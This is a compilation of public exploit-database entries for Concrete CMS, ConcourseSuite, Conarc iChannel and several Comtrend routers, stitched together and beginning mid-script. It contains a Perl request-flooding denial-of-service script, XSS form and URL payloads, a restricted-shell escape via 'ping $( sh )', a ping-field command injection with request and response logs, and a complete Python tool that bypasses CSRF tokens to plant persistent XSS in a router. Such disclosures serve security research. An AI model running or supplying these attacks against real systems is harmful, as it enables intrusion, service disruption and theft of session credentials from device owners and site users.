if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<66; $i--)
{
$user="w00t".$rand.$i;
$data = "Aa"
;
$lenx = length $data;
$rpc = "POST ".$dir."concrete/js/tiny_mce/plugins/spellchecker/rpc.php HTTP/1.1\r\n". # Or use just /index.php
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $lenx\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$rpc", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\Ex: $0 127.0.0.1 /concrete/\n";
print "\Ex2: $0 target.com /\n\n";
exit();
};
# << ThE|End
source: https://www.securityfocus.com/bid/49276/info
Concrete is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Concrete 5.4.1.1 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/Concrete/index.php/login/do_login/" method="post">
<input type="hidden" name="uName" value="test" />
<input type="hidden" name="uPassword" value="test" />
<input type="hidden" name="rcID" value='" style=display:block;color:red;width:9999;height:9999;z-index:9999;top:0;left:0;background-image:url(javascript:alert(/XSS/));width:expression(alert(/XSS/)); onmouseover="alert(/XSS/)' />
<input type="submit" name="submit" value="Get Concrete CMS 5.4.1.1 XSS" />
</form>
source: https://www.securityfocus.com/bid/54881/info
The ConcourseSuite is prone to a cross-site request-forgery vulnerability and multiple cross-site scripting vulnerabilities.
An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete, or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.
ConcourseSuite version 6.1 (20120209) is vulnerable; other versions may also be affected.
http://www.example.com/crm/Sales.do?nameFirst&nameLast
http://www.example.com/crm/ExternalContacts.do?nameFirst&nameLast&company
http://www.example.com/crm/Accounts.do?name
http://www.example.com/crm/MyCFSProfile.do?address1state
# Exploit Title: Conarc iChannel - Unauthenticated Access/Default Webserver Misconfiguration allows for compromise of server
# Date: 2017-12-19
# Exploit Author: Information Paradox
# CVE : CVE-2017-17759
https://(affectedserver)/wc.dll?wwMaint~EditConfig
The customized webserver used by iChannel is based on an outdated and
vulnerable version of WestWind Webserver. This page is available,
unauthenticated, to a malicious attacker.
By visiting this link, the attacker can access the webserver configuration
edit page. This page reveals sensitive information, allows for alteration
of the webserver configuration, upload/modification of the server's
configuration and can result in a Denial of Service attack by deleting the
configuration.
This has been acknowledged by Conarc and they have been notified of the
impact.
If your iChannel install is available publicly, this can result in complete
compromise of the server, the web application and severe information
leakage/DOS.
Resolution:
Conarc has been notified of this issue. Until this issue is patched, the
affected installs should be removed from public access. In the case of
private deployments, this page should have an ACL applied to prevent
unauthenticated access to this page.
# Exploit Title: Comtrend-AR-5310 - Restricted Shell Escape
# Date: 2019-07-20
# Exploit Author: AMRI Amine
# Vendor Homepage: https://www.comtrend.com/
# Version: GE31-412SSG-C01_R10.A2pG039u.d24k
# Tested on: Linux (busybox)
TL;DR: A local user can bypass the restricted shell using the command substitution operator $( commmand )
Comtrend AR 5310 routers have a restricted shell, the list of command a user can execute is
[ ? help logout exit quit reboot ads lxdslctl xtm loglevel logdest virtualserver ddns dumpcfg dumpmdm meminfo psp dumpsysinfo dnsproxy syslog ifconfig ping sntp sysinfo tftp wlan wlctl vlanctl arp defaultgateway dhcpserver dns lan lanhosts passwd ppp restoredefault route nslookup traceroute save uptime exitOnIdle wan build version serialnumber modelname acccntr upnp urlfilter timeres tr69cfg logouttime ipneigh dhcp6sinfo nat mcpctl ]
Usual terminal constructs like:
the command separator ";"
the control operator "&" (run in forground)
the redirection operator (pipe) "|"
the command substitution operator "`"
are all filtered as shown here :
> ;
Warning: operator ; is not supported!
telnetd:error:476.449:processInput:490:unrecognized command
> |
Warning: operator | is not supported!
telnetd:error:484.871:processInput:490:unrecognized command
> &
Warning: operator & is not supported!
telnetd:error:487.421:processInput:490:unrecognized command
> `
Warning: operator ` is not supported!
telnetd:error:495.334:processInput:490:unrecognized command
Still the $ operator is not filtered:
> $
telnetd:error:497.862:processInput:490:unrecognized command $
Here i came to the conclusion that invoking a command with $( subcommand ) as argument would give an obvious shell
> ping $( sh )
exec >&2
ps x | grep telnet
18333 root 4164 S telnetd -m 0
18334 root 4168 S telnetd -m 0
EOF
# Title: Comtrend VR-3033 - Authenticated Command Injection
# Date: 2020-02-26
# Author: Author : Raki Ben Hamouda
# Vendor: https://us.comtrend.com
# Product link: https://us.comtrend.com/products/vr-3030/
# CVE: CVE-2020-10173
The Comtrend VR-3033 is prone to Multiple Authenticated Command Injection
vulnerability via ping and traceroute diagnostic page.
Remote attackers are able to get full control and compromise the network
managed by the router.
Note : This bug may exist in other Comtrend routers .
===============================================
Product Page :
https://us.comtrend.com/products/vr-3030/
Firmware version :
DE11-416SSG-C01_R02.A2pvI042j1.d26m
Bootloader (CFE) Version :
1.0.38-116.228-1
To reproduce the vulnerability attacker has to access the interface at
least with minimum privilege.
1- Open interface
2- click on 'Diagnostic' tab on top.
3- click then on 'Ping' or traceroute
4- on the text input, type 'google.fr;ls - l'
5 - a list of folder names should appear.
#############################
POC session Logs :
GET /ping.cgi?pingIpAddress=google.fr;ls&sessionKey=1039230114 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:73.0)
Gecko/20100101 Firefox/73.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic dXNlcjp1c2Vy
Connection: close
Referer: http://192.168.0.1/pingview.cmd
Upgrade-Insecure-Requests: 1
=====================++RESPONSE++=====================
HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Fri, 02 Jan 1970 00:00:26 GMT
Content-Type: text/html
Connection: close
<html><head>
<meta HTTP-EQUIV="Pragma" CONTENT='no-cache'>
<link rel="stylesheet" href='stylemain.css' type='text/css'>
<link rel="stylesheet" href='colors.css' type='text/css'>
<script language="javascript" src="util.js">
</script>
<script language="javascript">
<!-- hide
function btnPing() {
var loc = 'ping.cgi?';
with ( document.forms[0] ) {
if (pingIpAddress.value.length == 0 ) {
return;
}
loc += 'pingIpAddress=' + pingIpAddress.value;
loc += '&sessionKey=1592764063';
}
var code = 'location="' + loc + '"';
eval(code);
}
// done hiding -->
</script>
</head>
<body>
<blockquote>
<form>
<b>Ping </b><br>
<br> Send ICMP ECHO_REQUEST packets to network hosts.<br>
<br><table border="0" cellpadding="0" cellspacing="0"><tr>
<td width="170">Ping IP Address / Hostname:</td>
<td width="170"><input type='text' name='pingIpAddress'
onkeydown="if(event.keyCode == 13){event.returnValue = false;}"></td>
<td width=""><input type='button' onClick='btnPing()' value='Ping'></td>
</tr></table><br>
<tr>
<td>bin
</td><br>
</tr>
<tr>
<td>bootfs
</td><br>
</tr>
<tr>
<td>data
</td><br>
</tr>
<tr>
<td>debug
</td><br>
</tr>
<tr>
<td>dev
</td><br>
</tr>
<tr>
<td>etc
</td><br>
</tr>
<tr>
<td>lib
</td><br>
</tr>
<tr>
<td>linuxrc
</td><br>
</tr>
<tr>
<td>mnt
</td><br>
</tr>
<tr>
<td>opt
</td><br>
</tr>
<tr>
<td>proc
</td><br>
</tr>
<tr>
<td>sbin
</td><br>
</tr>
<tr>
<td>sys
</td><br>
</tr>
<tr>
<td>tmp
</td><br>
</tr>
<tr>
<td>usr
</td><br>
</tr>
<tr>
<td>var
</td><br>
</tr>
<tr>
<td>webs
</td><br>
</tr>
</form>
</blockquote>
</body>
</html>
##Same bug with the same way we exploited in ping function can be exploited
the same way in traceroute function.
===========
##Timeline :
*Bug sent to vendor : 17-02-2020
*No Response after 10 days
* Public disclosure: 27-02-020
source: https://www.securityfocus.com/bid/67033/info
Comtrend CT-5361T ADSL Router is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.
An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.
Comtrend CT-5361T firmware version A111-312SSG-T02_R01 is vulnerable; other versions may also be affected.
http://www.example.com/password.cgi?sysPassword=[Your Password]
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Exploit Title: Persistent XSS on Comtrend AR-5387un router
Date: 19/10/2020
Exploit Author: OscarAkaElvis
Vendor Homepage: https://www.comtrend.com/
Version: Comtrend AR-5387un router
Tested on: Software/Firmware version A731-410JAZ-C04_R02.A2pD035g.d23i
CVE: CVE-2018-8062
Disclosure timeline:
08/03/2018: Vulnerability was discovered
10/03/2018: Reported to Mitre (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8062)
11/03/2018: Mitre answered, CVE number reserved
11/03/2018: Reported to Comtrend as part of responsible disclosure, they never answered
16/10/2020: Two years later, reported again to Comtrend and public disclosure (https://twitter.com/OscarAkaElvis/status/1317004119509471233)
18/10/2020: Exploit creation
19/10/2020: Exploit sent to exploit-db
Exploitation explanation:
To exploit this vulnerability, once logged into the router, a WAN service must be created
Click on "Advanced Setup", "WAN Service". "Add button", "Next"
Then insert the payload into the "Enter Service Description" field. This was used for the PoC <script>alert('xss');</script>
Then click on "Next" four times to go on through the steps and finally click on "Apply/Save"
The result of the XSS will be displayed and triggered on the WAN services page
This exploit automatize the entire process bypassing CSRF protection and allowing to set a custom XSS payload
Happy hacking :)
OscarAkaElvis - https://twitter.com/OscarAkaElvis
"""
# Dependencies and libraries
import requests
from requests.auth import HTTPBasicAuth
import re
from sys import argv, exit
import argparse
from os import path
from time import sleep
class Exploit(object):
# Global class vars
session = requests.Session()
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Safari/537.36"
ip = None
username = None
password = None
payload = None
default_ip = "192.168.1.1"
default_username = "admin"
default_password = "admin"
default_payload = "<script>alert('xss');</script>"
exploit_version = "1.0"
current_sessionkey = None
referer_sessionkey = None
script_name = path.basename(argv[0])
description_text = 'CVE-2018-8062 exploit by OscarAkaElvis, Persistent XSS on Comtrend AR-5387un router'
epilog_text = 'Examples:\n python3 ' + script_name + ' -i 192.168.0.150\n python3 ' + script_name + ' -u admin -p mySecureRouterP@ss\n python3 ' + script_name + ' -i 10.0.0.1 -u admin -p mySecureRouterP@ss -x \'<script>evil_js_stuff</script>\''
def start_msg(self):
print("[*] Starting CVE-2018-8062 exploit...")
sleep(0.5)
def check_params(self, arguments):
parser = argparse.ArgumentParser(description=self.description_text, formatter_class=argparse.RawDescriptionHelpFormatter, epilog=self.epilog_text)
parser.add_argument('-i', '--ip', dest='ip', required=False, help="set router's ip", metavar='IP')
parser.add_argument('-u', '--username', dest='username', required=False, help="set user to login on router", metavar='USERNAME')
parser.add_argument('-p', '--password', dest='password', required=False, help="set password to login on router", metavar='PASSWORD')
parser.add_argument('-x', '--xss-payload', dest='payload', required=False, help="set xss payload", metavar='PAYLOAD')
parser.add_argument('-v', '--version', action='version', version=self.print_version(), help="show exploit's version number and exit")
args = parser.parse_args(arguments)
self.start_msg()
print("[*] Launch the exploit using -h argument to check all the available options")
print()
if not args.ip:
self.ip = self.default_ip
print("[!] Warning, no ip set, default will be used: " + str(self.ip))
else:
self.ip = args.ip
if not args.username:
self.username = self.default_username
print("[!] Warning, no username set, default will be used: " + str(self.username))
else:
self.username = args.username
if not args.password:
self.password = self.default_password
print("[!] Warning, no password set, default will be used: " + str(self.password))
else:
self.password = args.password
if not args.payload:
self.payload = self.default_payload
print("[!] Warning, no XSS payload set, PoC default will be used: " + str(self.payload))
else:
self.password = args.password
def print_version(self):
print()
return 'v{}'.format(self.exploit_version)
def check_router(self):
try:
print()
print("[*] Trying to detect router...")
headers = {"User-Agent": self.user_agent}
response = self.session.get("http://" + str(self.ip) + "/", headers=headers)
if re.match(r'.*WWW-Authenticate.*Broadband Router.*', str(response.headers)):
print("[+] Comtrend router detected successfully")
else:
print()
print("[-] It seems the target is not a Comtrend router")
print("[*] Exiting...")
exit(1)
except (TimeoutError, ConnectionError, requests.exceptions.ConnectionError):
print()
print("[-] Can't connect to the router")
print("[*] Exiting...")
exit(1)
def check_login(self):
print()
print("[*] Trying to login...")
headers = {"User-Agent": self.user_agent}
response = self.session.get("http://" + str(self.ip) + "/", headers=headers, auth=HTTPBasicAuth(self.username, self.password))
if response.status_code != 401:
print("[+] Login successfully!")
sleep(1)
else:
print()
print("[-] Can't login into the router. Check your creds!")
print("[*] Exiting...")
exit(1)
def get_sessionKey(self, response_text):
sessionKey = re.search(r'.*sessionKey=([0-9]+).*', str(response_text))
if sessionKey is not None:
sessionKey = sessionKey.group(1)
else:
sessionKey = re.search(r'.*sessionKey=\\\'([0-9]+).*', str(response_text), re.MULTILINE)
if sessionKey is not None:
sessionKey = sessionKey.group(1)
return sessionKey
def step1(self):
print()
print("[*] Performing step 1/8. Getting initial sessionKey to bypass CSRF protection...")
headers = {"User-Agent": self.user_agent}
response = self.session.get("http://" + str(self.ip) + "/wancfg.cmd", headers=headers, auth=HTTPBasicAuth(self.username, self.password))
self.current_sessionkey = self.get_sessionKey(response.content)
print("[+] Success! Initial sessionKey: " + self.current_sessionkey)
sleep(1)
def step2(self):
print()
print("[*] Performing step 2/8...")
paramsGet = {"sessionKey": self.current_sessionkey, "serviceId": "0"}
headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wancfg.cmd"}
response = self.session.get("http://" + str(self.ip) + "/wanifc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
self.referer_sessionkey = self.current_sessionkey
self.current_sessionkey = self.get_sessionKey(response.content)
sleep(1)
def step3(self):
print()
print("[*] Performing step 3/8...")
paramsGet = {"sessionKey": self.current_sessionkey, "wanL2IfName": "atm0/(0_8_35)"}
headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wanifc.cmd?serviceId=0&sessionKey=" + self.referer_sessionkey}
response = self.session.get("http://" + str(self.ip) + "/wansrvc.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
self.referer_sessionkey = self.current_sessionkey
self.current_sessionkey = self.get_sessionKey(response.content)
sleep(1)
def step4(self):
print()
print("[*] Performing step 4/8...")
paramsGet = {"vlanMuxPr": "-1", "sessionKey": self.current_sessionkey, "vlanMuxId": "-1", "ntwkPrtcl": "0", "enVlanMux": "1", "enblEnetWan": "0", "serviceName": self.payload}
headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/wansrvc.cmd?wanL2IfName=atm0/(0_8_35)&sessionKey=" + self.referer_sessionkey}
response = self.session.get("http://" + str(self.ip) + "/pppoe.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
self.referer_sessionkey = self.current_sessionkey
self.current_sessionkey = self.get_sessionKey(response.content)
sleep(1)
def step5(self):
print()
print("[*] Performing step 5/8...")
paramsGet = {"useStaticIpAddress": "0", "pppLocalIpAddress": "0.0.0.0", "sessionKey": self.current_sessionkey, "enblIgmp": "0", "enblFullcone": "0", "pppTimeOut": "0", "pppAuthErrorRetry": "0", "pppServerName": "", "enblPppDebug": "0", "pppPassword": "", "enblNat": "0", "enblOnDemand": "0", "pppUserName": "", "pppIpExtension": "0", "enblFirewall": "0", "pppAuthMethod": "0", "pppToBridge": "0"}
headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/pppoe.cgi?enblEnetWan=0&ntwkPrtcl=0&enVlanMux=1&vlanMuxId=-1&vlanMuxPr=-1&serviceName=pppoe_0_8_35&sessionKey=" + self.referer_sessionkey}
response = self.session.get("http://" + str(self.ip) + "/ifcgateway.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
self.referer_sessionkey = self.current_sessionkey
self.current_sessionkey = self.get_sessionKey(response.content)
sleep(1)
def step6(self):
print()
print("[*] Performing step 6/8...")
paramsGet = {"sessionKey": self.current_sessionkey, "defaultGatewayList": "ppp0.1"}
headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcgateway.cgi?pppUserName=&pppPassword=&enblOnDemand=0&pppTimeOut=0&useStaticIpAddress=0&pppLocalIpAddress=0.0.0.0&pppIpExtension=0&enblNat=0&enblFirewall=0&enblFullcone=0&pppAuthMethod=0&pppServerName=&pppAuthErrorRetry=0&enblPppDebug=0&pppToBridge=0&enblIgmp=0&sessionKey=" + self.referer_sessionkey}
response = self.session.get("http://" + str(self.ip) + "/ifcdns.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
self.referer_sessionkey = self.current_sessionkey
self.current_sessionkey = self.get_sessionKey(response.content)
sleep(1)
def step7(self):
print()
print("[*] Performing step 7/8...")
paramsGet = {"dnsRefresh": "1", "sessionKey": self.current_sessionkey, "dnsPrimary": "1.1.1.1", "dnsSecondary": "8.8.8.8"}
headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ifcdns.cgi?defaultGatewayList=ppp0.1&sessionKey=" + self.referer_sessionkey}
response = self.session.get("http://" + str(self.ip) + "/ntwksum2.cgi", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
self.referer_sessionkey = self.current_sessionkey
self.current_sessionkey = self.get_sessionKey(response.content)
sleep(1)
def final_step8(self):
print()
print("[*] Performing final step 8/8. Deploying XSS payload...")
paramsGet = {"sessionKey": self.current_sessionkey, "action": "add"}
headers = {"User-Agent": self.user_agent, "Referer": "http://" + str(self.ip) + "/ntwksum2.cgi?dnsPrimary=1.1.1.1&dnsSecondary=8.8.8.8&dnsRefresh=1&sessionKey=" + self.referer_sessionkey}
self.session.get("http://" + str(self.ip) + "/wancfg.cmd", params=paramsGet, headers=headers, auth=HTTPBasicAuth(self.username, self.password))
print()
print("[+] XSS payload deployed successfully")
print("[+] Happy hacking :) . Author: OscarAkaElvis")
@staticmethod
def main(self, arguments):
self.check_params(arguments)
self.check_router()
self.check_login()
self.step1()
self.step2()
self.step3()
self.step4()
self.step5()
self.step6()
self.step7()
self.final_step8()
exit(0)
if __name__ == '__main__':
ImportObject = Exploit()
ImportObject.main(ImportObject, argv[1:])